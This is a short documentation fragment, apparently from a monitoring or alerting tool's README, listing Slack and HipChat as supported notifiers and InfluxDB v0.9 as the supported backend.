Supported Notifiers

  • Slack
  • HipChat

Supported Backends

  • InfluxDB v0.9